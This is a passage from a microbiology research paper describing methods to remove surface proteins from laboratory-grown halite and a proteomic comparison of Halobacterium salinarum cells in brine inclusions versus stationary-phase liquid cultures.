(i.e., weakly ionized gases) were generated using either a dielectric barrier discharge (DBD) device or an atmospheric pressure plasma jet (APPJ). They were polarized to high voltage using two types of electrical power supply: (1) an alternating current (AC) generator composed of a function generator (ELC, GF467AF) and a power amplifier (Crest Audio, CC5500), as well as (2) a pulse generator (RLC Electronic Company, NanoGen1 model) coupled with a high voltage power supply (Spellman Company, SLM 10 kV, 1,200 W model). The DBD and APPJ were supplied with different carrier gases (helium or argon), with or without oxygen. Hence, several plasma conditions were tested to produce active species (radicals and reactive oxygen species, but also electrons and photons). Table 1 details the experimental plasma conditions that were investigated as well as the resulting proteolysis, used to assess the efficiency of protein removal. #### 2.5.2 Chemical treatments Previous studies applied surface cleaning protocols developed for removal of cells and nucleic acids, as detailed in Supplementary Table 1. To adapt these protocols for the removal of surface-bound proteins, we modified the protocol of Sankaranarayanan et al. (2011), using shorter bath times to avoid dissolution of the smaller laboratory-grown crystals. 
Briefly, crystals were incubated in successive 5 min baths: 4.00%-4.99% NaOCl (Honeywell Research Chemicals; avoiding commercial bleach solutions that induced rapid and near-complete crystal dissolution) in saturated NaCl and 10 M NaOH in saturated NaCl, with or without 10 N HCl, followed by 100 mM Na\({}_{2}\)CO\({}_{3}\) in saturated NaCl. A sterile saturated NaCl solution was used to wash off each treatment solution between successive baths, testing both passive wash baths and active-spray washes using a peristaltic pump.

**Table 1**: Experimental parameters of the cold plasma sources used to remove surface-bound proteins.

| Plasma source | Amplitude | Frequency | Duty cycle | Gas and flow rate | Proteolysis |
| --- | --- | --- | --- | --- | --- |
| DBD (AC) | 7 kV | 500 Hz | - | He (1 slm) | 0.00% |
| | | | | He-O\({}_{2}\) (1 slm, 150 sccm) | 0.00% |
| | | | | He-O\({}_{2}\) (1 slm, 3 sccm) | 0.00% |
| | | | | Ar (1 slm) | 0.00% |
| APPJ (AC) | 7 kV | 700 Hz | - | He (6 slm) | 0.00% |
| APPJ (Pulse) | 7 kV | 700 Hz | 1% | He (6 slm) | 29.30% |
| | | | | He (6 slm, 100 sccm) | 39.10% |

### Protein extraction and preliminary desalting We optimized a protocol for protein extraction directly from halite crystals using TRIzol Reagent™ (Ambion, Life Technologies). TRIzol allows for the sequential separation of RNA and DNA prior to protein extraction (see Supplementary Figure 2-1). The protocol described below was based on both the manufacturer's protocol and that of Kirkland et al. (2006) used for protein extractions from liquid cultures of Haloferax volcanii. All steps described were performed with autoclaved glassware to avoid any organics contamination from plastics (bench top protocol, see Supplementary Information Section 2). All solvents used for protein extractions were HPLC-grade and suitable for mass spectrometry analysis. Crystals were fully immersed in 5 mL of TRIzol reagent in a 30 mL glass centrifuge tube and crushed using an autoclaved glass stir-rod. After 20 min incubation at 60\({}^{\circ}\)C, total RNA was extracted from the resulting cell lysate by adding 1 mL of 100% chloroform, incubating for 5 min at room temperature followed by phase separation by centrifugation (10,000g, 20 min, 4\({}^{\circ}\)C). The chloroform-containing aqueous phase was removed with an autoclaved glass Pasteur pipet and 1.5 mL of 100% ethanol was added to precipitate DNA. After 3 min at room temperature, the supernatant was collected by centrifugation (2,000g, 10 min, 4\({}^{\circ}\)C). Proteins were precipitated with 7.5 mL of 100% isopropanol and collected by centrifugation (10,000g, 20 min, 4\({}^{\circ}\)C). The resulting protein pellet was washed twice to remove phenol traces using 5 mL of 0.3 M guanidine-HCl in 95% ethanol to denature the proteins, followed by a third wash step with 5 mL of 100% ethanol to remove any residual guanidine-HCl. Each wash step was performed by incubating the protein pellet in the solution for 20 min at room temperature followed by centrifugation (10,000g, 20 min, 4\({}^{\circ}\)C). 
Protein desalting was accomplished by two successive protein precipitations with 2 mL of ice-cold 100% acetone (−20°C) and centrifugation (10,000 g, 20 min, 4°C). After acetone removal, the pellet was completely dried under laminar flow. Proteins were then solubilized in 1 M NaHCO\({}_{3}\) with 0.1% SDS at room temperature for 2 days and quantified with a bicinchoninic acid (BCA) protein assay (Pierce), using either bovine serum albumin (BSA) standard concentrations from the manufacturer's instructions for quantitative mass spectrometry, or adapted BSA standard concentrations for low protein concentrations (see Supplementary Information Section 3) when evaluating the removal of halite surface-bound proteins. The proteolysis rate was determined by comparing protein quantities with and without treatment.

Total proteins were extracted from _H. salinarum_ cultures in stationary growth phase using a similar procedure. For this, 2.0 x 10\({}^{10}\) cells from liquid cultures were pelleted by centrifugation (7,500 g, 10 min, 20°C) and the cell pellets directly resuspended in 5 mL TRIzol prior to following all steps described above for halite samples. After solubilization of the protein pellet in 1 M NaHCO\({}_{3}\) with 0.1% SDS at room temperature, protein quantification was performed using the BCA protein assay (Pierce) as per the manufacturer's instructions.

### iTRAQ® isobaric labeling and mass spectrometry

Aliquots of 100 µg of proteins for each sample condition and replicate were reduced using 2 mM tris(2-carboxyethyl)phosphine (TCEP) at 37°C for 1 h, and alkylated with 5 mM iodoacetamide for 30 min in the dark at room temperature prior to digestion with 5 µg of Trypsin Gold (Promega) for 15 h at 37°C. After digestion, additional desalting of peptides was done directly by solid phase extraction (SPE) using C18 cartridges (Sep-Pak C18 Plus Short 400 mg Sorbent, Waters). The resulting peptides were dried by speed-vac and resuspended in 0.5 M tetraethylammonium bromide (TEAB) prior to labeling. iTRAQ® labeling was performed according to the manufacturer's instructions (Applied Biosystems). Briefly, each of the iTRAQ® isobaric labeling reagents was reconstituted with isopropanol and then added to 50 µg of protein digest (113, 114, 115, and 116 iTRAQ® isobaric labels for proteins from liquid controls and 117, 118, 119, and 121 for halite brine inclusion protein extractions). After 2 h at room temperature, samples were desalted again by C18 SPE. The eluted labeled peptides were then dried by speed-vac and resuspended in 2% acetonitrile, 98% H\({}_{2}\)O with 0.1% formic acid (see Supplementary Information Section 4 for additional details).

Labeled peptide samples were analyzed by mass spectrometry as previously described (Pinel-Cabello et al., 2021) on a Q Exactive HF tandem mass spectrometer (Thermo Scientific) coupled to an UltiMate 3000 Nano LC System. Peptides were desalted online on an Acclaim PepMap100 C18 precolumn (5 µm, 100 Å, 300 µm i.d. x 5 mm) and further resolved on a nanoscale Acclaim PepMap100 C18 column (3 µm, 100 Å, 75 µm i.d. x 500 mm) at a flow rate of 200 nL min\({}^{-1}\) using a 120-min gradient of 4%–32% acetonitrile. A Top 20 strategy was applied in data-dependent acquisition mode. Full scan mass spectra were acquired from 350 to 1800 m/z at a resolution of 60,000 with an automatic gain control (AGC) target set at 3 x 10\({}^{6}\) ions.
MS/MS fragmentation was initiated when the AGC target reached 10\({}^{5}\) ions, with an intensity threshold of 9 x 10\({}^{4}\). Only precursor ions with potential charge states of 2+ and 3+ were selected for fragmentation, applying a dynamic exclusion time of 10 s.

### Mass spectrometry data analyses

#### Protein identification

Protein identifications were performed using PEAKS® X-Pro software (64-bit version, 2020, Bioinformatics Solutions). It performs de novo sequencing-assisted database searching against the protein coding sequences from _H. salinarum_ NRC-1 (8,533 entries from NCBI, download date 2021/08/03). Peptide-spectrum matching was carried out with the following parameters: (1) mass tolerance of 10 ppm on the parent ion, (2) mass tolerance of 0.005 Da for fragment ions from MS/MS, (3) carbamidomethylated Cys (+57.0215) and iTRAQ® isobaric tag on Lys and the N-terminus (+304.2054) as fixed modifications, and (4) oxidized Met (+15.9949), deamidated Asn and Gln (+0.9840) and iTRAQ® isobaric tag on Tyr (+304.2054) as variable modifications. The false discovery rate (FDR) was estimated with the decoy-fusion option included in the software. Proteins were then filtered with FDR < 1% (corresponding to a -10logP score above 25) for peptide-spectrum matches (PSMs), and a valid protein identification required a minimum of 2 unique peptides, with a -10logP score above the peptide filtering threshold, that could be mapped to only one protein group.

#### Protein iTRAQ® quantitation

The eight labeled samples (four replicates each of proteins from liquid stationary cultures and from halite brine inclusions) were mixed in equimolar ratios and injected in nanoLC-MS/MS in triplicate to reduce instrument variability, as previously described. Quantitation was performed using PEAKS Q (quantitation program) in iTRAQ 8-plex mode with 10 ppm mass tolerance, and only peptides with a score above the 1% FDR threshold were used to quantify the identified proteins. The resulting quantitation was filtered, accepting only protein groups with fold change ≥2, at least two unique peptides, and FDR-adjusted significance ≤1% for both protein identification and fold change (ANOVA significance method). Mass spectrometry proteomics data have been deposited to the ProteomeXchange Consortium via the PRIDE partner repository with the dataset identifier PXD037167 (project DOI: 10.6019/PXD037167).

#### Sample comparisons and functional annotation

Potential biases during analysis were avoided by filtering the protein identifications produced by the PEAKS software to group proteins having multiple annotations in the NCBI database. To do so, we developed custom BASH and PYTHON scripts to merge all descriptions for one protein identifier (favoring, in order, AAG-type, DAC-type, WP-type and then QBH-type identifiers). Venn diagrams were computed with the VennDiagram and ggplot2 packages in R. Functional protein annotation was done with the Kyoto Encyclopaedia of Genes and Genomes (KEGG; Kanehisa and Goto, 2000) using the blastKOALA tool (Kanehisa et al., 2016; [https://www.kegg.jp/blastKOALA/](https://www.kegg.jp/blastKOALA/)), assigning KEGG Orthology identifiers (also called K numbers) to identified proteins (see Supplementary Table 6-2). K numbers were then used for mapping identified proteins onto pre-existing metabolic pathways using the KEGG Mapper search tool ([https://www.kegg.jp/kegg/mapper/search.htm](https://www.kegg.jp/kegg/mapper/search.htm); see Supplementary Table 6-3).
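To illustrate the identifier-grouping step described above, the sketch below shows one way such a merge could be implemented. It is not the authors' actual script; the function names and the example accessions are hypothetical, and only the accession-prefix preference order (AAG > DAC > WP > QBH) is taken from the text.

```python
# Illustrative sketch (not the authors' script): collapse multiple NCBI annotations
# for the same protein group into a single record, preferring accession types in the
# order AAG > DAC > WP > QBH, and pooling all descriptions for that group.
from collections import defaultdict

PREFERENCE = ["AAG", "DAC", "WP", "QBH"]  # preference order stated in the Methods

def accession_rank(accession: str) -> int:
    """Lower rank = more preferred accession prefix; unknown prefixes go last."""
    for rank, prefix in enumerate(PREFERENCE):
        if accession.startswith(prefix):
            return rank
    return len(PREFERENCE)

def merge_annotations(records):
    """records: iterable of (protein_group_id, accession, description) tuples."""
    grouped = defaultdict(list)
    for group_id, accession, description in records:
        grouped[group_id].append((accession, description))
    merged = {}
    for group_id, entries in grouped.items():
        entries.sort(key=lambda e: accession_rank(e[0]))
        best_accession = entries[0][0]
        all_descriptions = "; ".join(sorted({d for _, d in entries}))
        merged[group_id] = (best_accession, all_descriptions)
    return merged

# Hypothetical example records (identifiers for illustration only):
records = [
    ("grp1", "WP_010902588.1", "hypothetical protein"),
    ("grp1", "AAG18778.1", "bacterio-opsin activator-like protein"),
    ("grp2", "QBH00001.1", "gas vesicle protein GvpO"),
]
print(merge_annotations(records))
```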
## 3 Results

### Characterization of laboratory-grown halite containing _Halobacterium salinarum_

In order to study the physiology of _H. salinarum_ cells after entombment within brine inclusions, we first needed to characterize the laboratory-grown halite, including the resultant crystal size, cell localization, and surface-bound biomolecules. This enabled the establishment of selection criteria for downstream proteomics analyses and the development of protocols to exclude any "contaminant" proteins from the surface of the crystal.

#### 3.1.1 Variability of _Halobacterium salinarum_ cells from inoculated laboratory-grown halite

Laboratory-grown halite crystals produced from TNPA solutions containing _H. salinarum_ cells using a slow evaporative process exhibited heterogeneous crystallization with respect to crystal size and coloration. As shown in Figure 1, even replicates produced under the same conditions yielded different quantities of hopper and fishtail crystals of varying lengths and widths, but with relatively uniform thicknesses (\(\pm\)1 mm). Color variations observed for halite in this study were likely the result of heterogeneities in the number of brine inclusions containing pigmented Halobacterium cells. The red color indicative of _H. salinarum_ cells tended to concentrate in the center of hopper crystals, where inclusions were most abundant (Roedder, 1984). Individual crystals of similar size and coloration were collected aseptically for further study, selecting only halite without visible defects signaling potential rupture of near-surface brine inclusions.

Figure 1: TNPA laboratory-grown halite crystals internally inoculated with Halobacterium salinarum cells observed after two months of incubation at 37°C for crystallization replicates 1–3 (A–C, respectively).

#### 3.1.2 Contaminating surface-bound cells and proteins

To evaluate the potential for 'contaminating' microbial cells or residual biomolecules at the crystal surface, the elemental composition of halite with and without _H. salinarum_ cells (Figures 2A, B, G, H, K, L) was determined by SEM-EDX. Elemental analyses of control halite derived from evaporation of the TNPA solution only exhibited the expected sodium chloride crystal surface, along with dense, irregular agglomerates (Figures 2C–F) derived from the presence of organics (peptone, L-Arg) in the TNPA solution. The addition of _H. salinarum_ cells to the TNPA solution prior to evaporation produced structures similar to those of control crystals, with no intact _H. salinarum_ cells visible on halite surfaces (Figures 2I, J). However, EDX analyses revealed differences in the distribution of carbon compared to control samples, as well as the presence of microscopic KCl crystals at the halite surface (Figures 2I, J) that were not found on control TNPA-derived crystals without _H. salinarum_ cells. These differences were due to lysis of surface-adhered _H. salinarum_ cells releasing high concentrations of cytosolic K\({}^{+}\) and Cl\({}^{-}\) accumulated as part of the "salt-in" osmoadaptation strategy (Engel and Catchpole, 2005). In order to assess the potential for surface-bound contaminants, including viable cells as well as proteins, externally inoculated halite crystals were produced (Figure 2K). These externally inoculated halite crystals were then dissolved in growth medium and incubated at 37°C, 180 rpm to assess viability.
Such cultures reached a normal stationary phase (OD\({}_{600}>1.0\)), demonstrating that at least a sub-population of halite surface-attached cells was viable. Additionally, SEM-EDX analysis of externally inoculated crystals revealed an elemental composition and distribution similar to that of internally inoculated halite (bearing cells both within brine inclusions as well as on the halite surface) after two months post-evaporation (Figures 2M, N). Taken together, these results confirm the presence of both viable cells and cellular debris on the surface of halite after two months of desiccation, validating the need for a halite surface cleaning procedure to remove any residual proteins.

Figure 2: Laboratory-grown halite surface observations. (A–F) TNPA crystals without cells. (G–J) Internally inoculated TNPA crystals with Halobacterium salinarum cells incubated 2 months at 37°C. (K–N) Externally inoculated TNPA crystals. (A, G, K) Schematic representation of halite crystals without cells, internally inoculated and externally inoculated, respectively. (B, H, L) Visual observation of crystals without cells, internally inoculated and externally inoculated, respectively. (C, E) Secondary electron images. (I, M) Backscattered electron images. (D, F, J, N) Elemental composition analysis by EDX spectroscopy correlated, respectively, to the SEM images in panels C, E, I, M. Carbon and potassium appear in red and yellow, respectively.

### Development of total protein isolation methods for halite

For proteomics approaches, a new methodology was developed, based on the protocol of Kirkland et al. (2006) using TRIzol reagent. Briefly, the protocol was modified to optimize the desalting steps (required for direct halite extraction with its high NaCl content), protein pellet dissolution and protein digestion (see Supplementary Information Section 4 for details on the parameters tested during protocol development and optimization). To ensure that only proteins contained within fluid inclusions were extracted using this protocol, it was also necessary to develop methods to remove contaminating proteins from halite crystal surfaces.

### Development of proteolysis protocols for removal of halite surface-bound contaminants

Previous halite cleaning procedures from Gramain et al. (2011) and Sankaranarayanan et al. (2011) (see Supplementary Table 1-1) were developed to deactivate surface-contaminating microorganisms and remove surface-contaminating DNA. However, these methods were not designed for the removal of other types of biomolecule contaminants, such as proteins. A new, modified surface cleaning procedure was therefore needed to remove surface protein contamination and enable extraction of proteins only from within halite brine inclusions, while avoiding crystal dissolution during the cleaning process. To meet these requirements, both cold plasma treatments and chemical protocols were tested using externally inoculated halite.

Cold plasma exposure is routinely used in astrobiology to sterilize spacecraft surfaces of microbial contaminants prior to launch. For this reason, a cold plasma approach was investigated here for the decontamination of the halite surface. Two plasma sources, a DBD and an APPJ, were tested as an alternative to conventional liquid solvents. The expected benefit was to minimize halite dissolution-recrystallization events, hence ensuring the survival of the microorganisms within the halite.
However, owing to their insulating properties and irregular topography, halite crystals attenuate the plasma electric field and/or bend its field lines. As a result, and whatever the implemented plasma treatment (Ar, He, or He mixed with O\({}_{2}\)), the externally inoculated halite crystals still retained the pink coloration indicative of the protein and lipid pigments of _H. salinarum_ cells (data not shown). As shown in Table 1, the most efficient plasma treatment led only to partial cell lysis (as determined by culture-based viability tests following growth by OD\({}_{600}\)) and to a proteolysis of only 39.1%, based on extraction and quantification of the remaining proteins from halite surfaces using a modified BCA assay for low protein quantities; a value that remains insufficient for the application.

As an alternative, chemical treatments were tested, using protocols modified from the microorganism deactivation and DNA removal treatments of Sankaranarayanan et al. (2011) to extend them to proteolysis. First, reduced exposure times in each chemical bath relative to previously published protocols were tested, while maintaining the use of NaCl-saturated chemical solutions, in order to avoid crystal dissolution. Subsequent 5-min sequential NaOCl and NaOH treatments, either with or without an additional HCl treatment, resulted in insufficient halite surface proteolysis (Supplementary Figure 5-1a). This was likely due to the rough structure of hopper crystals, which could allow proteins to remain attached during passive chemical baths. Because the chemical treatments only partially degraded the contaminating biomolecules and reduced their attachment to the halite surface, an active-spray method was used for the wash steps to increase the efficiency of biomolecule removal and prevent re-association with halite surfaces, compared to the use of passive wash baths (Supplementary Figure 5-1b). This active-spray method also allowed for both deactivation of halite surface-bound microorganisms (as indicated by a lack of culture growth in post-treatment viability tests) and better proteolysis compared to passive chemical bath washes.

Using the protein extraction method described above, the efficacy of the active-spray method for removal of surface-bound proteins was tested by comparing NaOCl-NaOH and NaOCl-NaOH+HCl protocols. As shown in Figure 3A, the addition of an acid wash resulted in a proteolysis efficiency of 93.0 ± 4.3%, compared to 83.7 ± 15.9% without the HCl treatment step (residual proteins of 51.6 ± 31.6 µg and 120.5 ± 117.6 µg, respectively, n = 3). These results indicate that the NaOCl-NaOH+HCl protocol with active-spray washes (Figure 3B) provides optimal and more consistent surface proteolysis, particularly for the small laboratory-grown halite crystals used in this study. To ensure that this active-spray chemical treatment did not affect _H. salinarum_ cells within the halite brine inclusions, growth was monitored for crystals containing cells trapped in brine inclusions after surface chemical cleaning with the active-spray NaOCl-NaOH-HCl treatment. Viable cultures were obtained from dissolution of these crystals in CM growth medium, thereby validating the active-spray chemical surface protein removal protocol for use in studying biomolecules within halite brine inclusions.
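For reference, the proteolysis efficiencies quoted above follow from the quantification described in the Methods; assuming they are defined as the relative reduction in BCA-quantified protein recovered from treated versus untreated externally inoculated crystals, the corresponding relation is

\[
\text{proteolysis}\ (\%) = \left(1 - \frac{m_{\text{treated}}}{m_{\text{untreated}}}\right) \times 100,
\]

where \(m_{\text{treated}}\) and \(m_{\text{untreated}}\) denote the protein quantities extracted from crystal surfaces with and without the cleaning treatment, respectively.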
These new methods for removal of surface-bound proteins, followed by extraction of total proteins from halite brine inclusions using a modified TRIzol-based method with desalting, were then applied to address the question of how _H. salinarum_ acclimates to halite brine inclusions during the initial phase post-evaporation, using proteomics.

### Proteomic shifts in _Halobacterium salinarum_ induced by acclimation to halite brine inclusions

Total proteins were extracted from the brine inclusions of halite after two months of complete dryness, with surface-bound proteins removed using the new protocol detailed above. These brine inclusion extracts were compared to total proteins extracted from _H. salinarum_ cultures in stationary growth phase, representing conditions prior to halite formation. The proteins unique to each condition, as well as the common proteome between liquid cultures and halite interiors, were analyzed to determine how _H. salinarum_ acclimates to halite brine inclusions.

Using the mass spectrometry data of four replicates from each condition, 1,249 total proteins were identified from stationary phase liquid cultures and 1,052 from halite brine inclusions, representing 1,342 unique proteins. Comparisons of the four replicate samples per condition revealed a core proteome composed of 839 proteins common to all sample replicates for liquid cultures and 715 proteins for halite brine inclusion extracts (Figures 4A, B). Of these, 655 proteins were expressed by cells both in liquid cultures and within halite brine inclusions (hereafter referred to as "shared proteins"), while 60 were specific to halite brine inclusion samples and another 184 were only identified from liquid cultures (Figure 4C; Supplementary Table 6-1). KEGG blastKOALA searches provided matches for roughly 75% of these shared proteins (488 of 655 shared proteins), as well as 62% of proteins unique to halite brine inclusion samples (37 of 60 proteins) and 52% of proteins unique to liquid cultures (95 of 184 proteins; see Supplementary Table 6-2), allowing for functional pathway reconstruction (see Supplementary Table 6-3).

Figure 3: Surface-bound protein removal by chemical treatments with active-spray washes. (A) Percentage of proteins removed after NaOCl-NaOH treatment with or without an additional HCl treatment step, and subsequent residual protein quantity. (B) Overview of the optimal NaOCl-NaOH-HCl chemical treatment with active-spray washes.

As a qualitative approach is insufficient to determine the regulation of proteins leading to their differential expression in _H. salinarum_ cells within halite brine inclusions, a semi-quantitative mass spectrometry analysis was also performed. Results from all three injections were pooled to reduce instrument variability (Figure 5). Subsequently, 68 proteins from halite brine inclusions were identified with statistically significant changes in expression levels compared to liquid cultures (fold change ≥2; see Supplementary Table 6-4 and Supplementary Figure 6-1). KEGG blastKOALA searches provided functional pathway results for 80% of down-regulated proteins (35 of 44 proteins) and 71% of up-regulated proteins (17 of 24 proteins; see Supplementary Table 6-2). A summary of the proteomics results is shown in Figure 6 (and Supplementary Table 6-5), showing shared proteins between cells from stationary growth phase cultures and brine extracts, as well as proteins differentially expressed (up- or down-regulated) in halite-derived samples.
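For clarity, the replicate comparisons described above amount to simple set operations on the per-replicate protein lists. A minimal sketch of how the core proteomes and the shared/unique counts could be derived is shown below; the inputs are hypothetical and only illustrate the logic, not the actual data.

```python
# Minimal sketch of the replicate-comparison logic (hypothetical inputs): the core
# proteome of a condition is the intersection of its four replicate protein lists,
# and the shared/unique sets come from comparing the two core proteomes.
def core_proteome(replicates):
    """replicates: list of sets of protein identifiers (one set per replicate)."""
    core = set(replicates[0])
    for rep in replicates[1:]:
        core &= rep
    return core

# Hypothetical per-replicate identifications (four replicates per condition).
liquid_reps = [{"p1", "p2", "p3"}, {"p1", "p2", "p3", "p4"},
               {"p1", "p2", "p3"}, {"p1", "p2", "p3", "p5"}]
halite_reps = [{"p1", "p2", "p6"}, {"p1", "p2", "p6"},
               {"p1", "p2", "p6", "p7"}, {"p1", "p2", "p6"}]

liquid_core = core_proteome(liquid_reps)   # analogous to the 839 core proteins
halite_core = core_proteome(halite_reps)   # analogous to the 715 core proteins

shared = liquid_core & halite_core         # analogous to the 655 shared proteins
liquid_only = liquid_core - halite_core    # analogous to the 184 liquid-specific
halite_only = halite_core - liquid_core    # analogous to the 60 halite-specific
print(len(shared), len(liquid_only), len(halite_only))
```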
Investigations of cell activity targeted proteins involved in central metabolism, energy production, cell division, replication, transcription and translation pathways. The interactions of cells with the enclosed microenvironment of halite brine inclusions were examined via cell envelope proteins (surface layer cell wall proteins and transporters) as well as proteins involved in motility processes (chemotaxis, gas vesicles and the archaellum).

#### 3.4.1 Retention of proteins for central metabolism

Proteins involved in central metabolism, including key enzymes of glycolysis/gluconeogenesis and the TCA cycle, formed part of the shared proteome between halite brine inclusion extracts and stationary phase liquid cultures (Figure 6; Supplementary Table 6-5). Additionally, proteins involved in arginine fermentation and aerobic respiration were shared between halite brine inclusions and stationary growth phase liquid cultures. Quantitative analyses showed that the majority of proteins involved in pyruvate metabolism maintained consistent expression levels after two months of halite inclusion, with the exception of the up-regulation of proteins involved in acetyl-CoA production. Surprisingly, transporters and enzymes involved in the ADI pathway were expressed both by cells in stationary phase liquid cultures and in brine inclusion extracts, including the arginine deaminase, ornithine carbamoyl transferase, carbamate kinase, argininosuccinase, argininosuccinate synthetase, arginine-ornithine antiporter and an IclR family transcriptional regulator. Only arginine deaminase was found significantly up-regulated for cells from halite brine inclusions. Proteins for key components of the electron transport chain, including NADH dehydrogenase/oxidoreductase subunits B, C, D, and L, NAD(P)/FAD-dependent oxidoreductase, succinate dehydrogenase and ATP synthase subunits A, B, C, D, E, H, and I, were not found to be differentially regulated between free-living cells (liquid cultures) and cells trapped within halite brine inclusions (with the exception of the F subunit, which was lacking in one brine inclusion extract).

Figure 4: Venn diagrams of proteins identified by mass spectrometry for brine inclusion and liquid stationary culture samples. (A) Comparison of biological replicates for liquid stationary culture extracts. (B) Comparison of biological replicates for brine inclusion extracts. Black circles in (A,B) represent "core" proteins shared by the four replicates in both cases. (C) Comparison of core proteins between brine inclusion extracts and liquid stationary culture cells.

Figure 5: Venn diagram of the 68 proteins quantified by iTRAQ® with triple injection which exhibit significant differential expression in brine extracts compared to liquid stationary culture cells.

#### 3.4.2 Similar expression of DNA repair, replication, and cell division proteins

Eight proteins involved in chromosome partitioning were common to halite brine inclusion extracts and stationary growth phase cultures, along with 11 other proteins involved in DNA replication, including matches for DNA primase, polymerase, gyrase, topoisomerase and replication factors. Only four DNA replication proteins were found to be specific to stationary growth phase proteomes.
DNA repair processes were represented both within halite brine inclusions and liquid cultures by the DNA photolyase, Rad50, the UvrD repair helicase, UvrA exonuclease, RadA recombinase, Rad25 DNA repair helicase, Fen1 repair endonuclease and the Hel308 helicase, all shared between liquid and brine extracts. Other DNA repair proteins were specific to either halite or liquid samples. Stationary growth phase cultures contained additional repair proteins, including the RmeR site-specific deoxyribonuclease, endonuclease IV, RecJ single-strand exonuclease, MutL mismatch repair protein, DNA gyrase and N-glycosylase, whereas the UvrB, MutS and endonuclease III proteins were exclusive to halite brine inclusion proteomes.

#### 3.4.3 Shared transcriptional but reduced translational proteomes

Investigations of DNA transcription identified a shared proteome between liquid cultures and brine inclusions, including proteins for transcription initiation factors (TFIIE and TFIID) and transcriptional machinery (RNA polymerase subunits RpoA2, RpoB1, RpoB2, RpoD, and RpoE1). Proteins involved in transfer RNA biogenesis, such as tRNA ligases for 18 different amino acids, along with two ribonucleases, completed the shared transcriptional proteome of liquid culture cells and halite extracts. Only tRNA ligases specific for tryptophan and threonine, four unique transcriptional proteins (RpoF, RpoH, RpoN, and the NusA termination protein) and one unique transcription initiation factor (TFIIB) were found only in stationary growth phase cell extracts.

Translational activities were severely restricted for cells within halite brine inclusions, as evidenced by the down-regulation of 27 of the 42 ribosomal proteins shared by cells from both conditions tested. Only one ribosomal protein was up-regulated. The shared proteome between cells in halite brine inclusions and those in liquid culture included an additional 10 proteins involved in ribosome biogenesis, and 10 translation initiation factors, none of which showed any significant up- or down-regulation. We attempted to corroborate the low ribosomal abundances by isolating RNA using the same TRIzol-based method (see Supplementary Figure 2-1). However, the RNA obtained from halite samples was of too low quality and quantity compared to that from liquid cultures (see Supplementary Table 8-1) for quantitative and transcriptional analyses. This was likely due to a combination of low RNA abundance in the halite fluid inclusions (based on ribosomal protein abundances) and some RNA degradation during extraction due to inefficient desalting using TRIzol alone (see Supplementary Information Section 8 for further details).

Chaperone proteins showed a high degree of conservation between conditions, with thioredoxin, the chaperones DnaK and DnaJ along with the GrpE stimulator, Hsp20, thermosome subunits and prefoldin all shared by both liquid and halite extracts. Only the prefoldin beta subunit was down-regulated for cells from halite brine inclusions.

Figure 6: Schematic overview of targeted cellular functions involved in the early acclimation of Halobacterium salinarum to halite brine inclusions (for extended matched proteins, see Supplementary Table 6-5). Shared (*) indicates proteins found in all four brine inclusion extracts and all four liquid stationary culture extracts. Partially shared (**) indicates proteins found in both brine inclusions and stationary phase liquid cultures, but not in all replicate samples for each condition.
#### 3.4.4 S-layer maintained with minor cell envelope proteome changes in brine inclusions

S-layer proteins were identified in all liquid culture and halite samples without significant up- or down-regulation. Of the 20 membrane transporters shared between the proteomes of liquid cultures and cells inside halite brine inclusions, four were found to be up-regulated in halite brine inclusion extracts, including the UgpB glycerol-3-phosphate-binding protein precursor. Moreover, six proteins were found to be unique to the halite brine inclusion proteome, with up-regulation of the phosphate, iron, peptide/nickel, and glycerol-3-phosphate transporters.

#### 3.4.5 Modified sensory detection and motility

A high degree of variability was noted in the expression of sensory and motility proteins between halite brine inclusion extracts and stationary growth phase cultures. Some proteins were common to both proteomes without any differences in protein quantities, including the gas vesicle protein (Gvp) subunits F, C, and N of cluster A, while GvpA was found only in two of the four liquid cultures and two of the four halite samples. The GvpD and GvpI subunits of cluster A and GvpF of cluster B were found only sporadically in liquid samples. However, GvpO of clusters A and B was significantly down-regulated in halite brine inclusion extracts. The bacterio-opsin activator-like protein (Bat HTH-10 family transcription regulator; AAG18778.1), along with the 11 Htr signal transducers (including HtrI and HtrII that accompany the two sensory rhodopsins), were common to all conditions and replicates. In contrast, the bacterio-opsin activator (Bat; AAG19769.1) was only found in two of the four halite brine inclusion replicate samples. While this protein is hypothesized to be a DNA-binding transcriptional regulator in the photosensory network, its role remains unconfirmed. For the archaellum proteins, only archaellin B1 was down-regulated in halite samples, whereas archaellin A1 and the prearchaellin peptidase were identified only sporadically in liquid culture samples. Archaellins B2 and A2 and the flagellin-related H protein were found in all liquid culture replicates but in only one halite replicate. An examination of chemotaxis proteins showed that the 18 identified proteins, including CheR, CheA, CheW, CheC, CheB, and the methyl-accepting chemotaxis (MCP)-family Htr transducers, were shared between halite brine inclusion extracts and stationary growth phase liquid cultures.

## 4 Discussion

The initial objective of this study was to determine the molecular acclimation of haloarchaea to entrapment within halite brine inclusions using a proteomics approach. To this aim, we first needed to (1) better characterize the process of laboratory-based evaporation for halite entrapment of haloarchaea and its effects on both the resulting halite and the microbial cells, (2) develop efficient methods for the removal of halite surface-bound cells and biomolecules in order to isolate only proteins contained within the brine inclusions, (3) develop effective methods for protein extraction directly from halite brine inclusions in a shorter time period to avoid alterations in protein expression that can occur during gradual salt dissolution, and finally (4) combine these approaches to analyze total proteins of _H. salinarum_ extracted from halite brine inclusions and compare these to control samples from stationary phase liquid cultures in order to propose a model of acclimation within halite.
A slow evaporative process was chosen to generate the internally inoculated halite in order to model natural processes that occur over time scales sufficient for cellular acclimation to the environmental changes, rather than a rapid "shock" evaporative process.

### Biotic/abiotic interactions influencing halite formation and _H. salinarum_ viability

Similar to previous studies of the survival of halophiles within halite brine inclusions, a NaCl-based buffered evaporation solution was used in this study (Norton and Grant, 1988; Fendrihan et al., 2012; Kixmuller and Greie, 2012). However, here we chose to add nutrient sources (1% peptone, 0.5% L-Arg HCl) to simulate organics present in the natural environment. This enabled us to study the role of metabolism in the survival and acclimation processes of _H. salinarum_ cells during the early phases of entrapment within halite brine inclusions. The presence of microbial biomass and additional organics can affect halite precipitation processes and may also explain the crystallization heterogeneity observed. For example, Norton and Grant (1988) previously demonstrated a positive correlation between the initial microbial cell density in liquid culture and the quantity of halite brine inclusions formed during evaporation.

